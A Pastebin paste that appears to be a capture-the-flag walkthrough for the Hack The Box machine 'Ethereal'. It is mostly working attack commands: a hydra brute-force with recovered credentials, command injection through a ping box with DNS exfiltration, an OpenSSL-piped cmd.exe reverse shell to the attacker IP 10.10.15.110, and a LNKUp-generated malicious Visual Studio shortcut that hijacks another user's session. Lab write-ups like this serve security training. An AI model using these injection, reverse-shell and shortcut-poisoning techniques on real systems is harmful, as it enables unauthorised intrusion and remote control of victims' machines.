API tools faq
paste
Guest User

pp

a guest
Nov 3rd, 2018
196
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.70 KB | None | 0 0
raw download clone embed print report
  1. so to check FDISK,DISK1,DISK2, contents we can run:
  2. mkdir ./mnt && mkdir ./mnt/FDISK && mount -o loop FDISK ./mnt/FDISK
  3. mkdir ./mnt && mkdir ./mnt/DISK1 && mount -o loop DISK1 ./mnt/DISK1
  4. mkdir ./mnt && mkdir ./mnt/DISK2 && mount -o loop DISK2 ./mnt/DISK2
  5.  
  6. so in FDISK we manage to found pbox.exe and pbox.dat
  7. after researching i found pbox.exe its somewhat linked to an old emulator for games and dos programs named "DOSBOX""
  8. and we can install in our kali wiht apt-get install dosbox
  9. Now in dosbox we can mount our files like this:
  10. mount c /path/to/box/files
  11. running pbox.exe ask for cwsdpmi.zip its some sort or a depency so we download from here:
  12. https://www.dosgames/com/files/cwsdpmi.zip
  13. and extract and place on /mnt/FDISK/pbox/
  14. now we can mount our path and run pbox.exe which ask for a password so we use the most common password: "password""
  15. and we are in.
  16.  
  17. 4)now some sort of database program show up everytime we select one item it shows us a user and a password so we can make a list out of and crack it trought hydra
  18.  
  19. hydra -L user.txt -P password.txt http-get://ethereal.htb:8080
  20.  
  21. and was able to get basic auth:
  22.  
  23. user: alan
  24. password: !C414m17y57r1k3s4g41n!
  25.  
  26. we test it in our 8080 port site and we are in with an admin console and a test box that shows test connection.
  27. so immediately go and test my ip showing and see that connection its successful.
  28.  
  29. Then tried appeding commands after ping command using &&, ||, |
  30.  
  31. Was able to run commands at first with
  32. || for /f "tokens" %i in ('whoami') do nslookup %i 10.10.15.110
  33. without my ip addres which shows me the name 'etherealalan' on wireshark results.
  34.  
  35. If played with the token number was able to see whichever word of a response i selected as the token number.
  36. e.g. if the response to whoami was "ethereal\alan" the backslash character does not travel through the results we can view, so the token =1, would give me the world etherealalan, whereas if i did the command "echo test 123", token =1 would show test and token=2 would show 123.
  37.  
  38. At this point it was safe to say we were dealing with blind read-only RCE.
  39. Enumerating this way was an absolute pain and i had to check my other options.
  40.  
  41. Since i knew i couldnt execute anything, i wanted to know why.
  42.  
  43. I checked the firewall rules, using:
  44. netsh advfirewall firewall show rule name=all
  45.  
  46. this showed port 73 and 136 are open and openssl.exe installed.
  47.  
  48. so we can do this:
  49. -first we create our key.pem and cert.pem with this command:
  50.  
  51. openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
  52.  
  53. -then we setup our first terminal and launch this command to listen on port 73:
  54.  
  55. openssl s_server -quiet -key key.pem -cert cert.pem -port 73
  56.  
  57. -now on a second terminal we run this command to listen for connections port 136:
  58.  
  59. openssl s_server -quiet -key key.pem -cert cert.pem -port 136
  60.  
  61. and finally from admin console we launch this command:
  62.  
  63. 10.10.15.110 | C:\Progra~2\OpenSSL-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.15.110:73 | cmd.exe | C:\Progra~2\OpenSSL-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.15.110:136
  64.  
  65.  
  66. Now i was trying to run commands as it its on the shell i got but nothings seems to work after for mistake i typed a dir comand and hit send to see if it works then trying to open another shell with webadmin console i didnt stop my preovious shell an run the command again a magic the command worked!
  67.  
  68. So to run commands we must execute the command on port 73 terminal then send admin console web command and it gets executed!
  69. Now we have to find a way to upload files researching we came to an easy solution
  70.  
  71. on my kali:
  72.  
  73. openssl s_server -quiet -key key.pem -cert cert.pem -port 73 < uploadme.txt
  74.  
  75. on webapp:
  76.  
  77. 10.10.15.110 | C:\Progra~2\OpenSLL-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.15.110:73 > c:\users\public\desktop\shortcuts\saveme.txt
  78.  
  79. while enumerating we found a file located in c:\users\public\desktop\note-draft.txt which said:
  80. "I've created a shortcut for VS on the Public Desktop to ensure we use the same version. Please delete any existing shortcuts and use this one instead.
  81. -Alan
  82. this command its useful to run a command and if want an answer automatick respond
  83. echo yes | command to run
  84.  
  85.  
  86. Now we have to replace the lnk file located on C:\users\public\desktop\shortcut\"Visual Studio 2017.lnk""
  87.  
  88. sow we can generate one with this program
  89.  
  90. LNKUp(on github)
  91.  
  92. python generate.py --host localhost --type ntlm --output pay.lnk --execute "C:\Progra~2\OpenSSL-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.15.110:73 | cmd.exe | C:\Progra~2\OpenSSL-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.15.110:136"
  93.  
  94. then we can encoded in base 64 doing
  95.  
  96. openssl base64 -A -e -in pay.lnk -out pay
  97.  
  98. then copy the string encoded and go to windows machine and run this command:
  99.  
  100. echo | set /p="base64 encoded string" > c:/users/public/desktop/shortcuts/pipo.txt
  101.  
  102. next step its to decode the file which one we put encoded string and at the same time replace the visual studio.lnk
  103. so we navigate to the dir containing the .lnk file and do this :
  104.  
  105. cd c:\users\public\desktop\shortcuts
  106. c:\progra~2\openssl-v1.1.0\bin\openssl base64 -A -d -in pipo.txt -out "Visual Studio 2017.lnk"
  107. type c:\users\public\desktop\shortcuts\"Visual Studio 2017.lnk"# to check if the lnk got replaced
  108. then if it got replaced you have to kill the 2 shell connections and start it again to wait for jorges connection:
  109. ***note***
  110. We have to be precise with timing cuz it seems the lnk file gets replaced by the original every few minutes so maybe it will not work at first time cuz timing.
  111.  
  112. Once we have the connection we can now read the user flag.
  113. type c:\users\jorge\desktop\user.txt
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!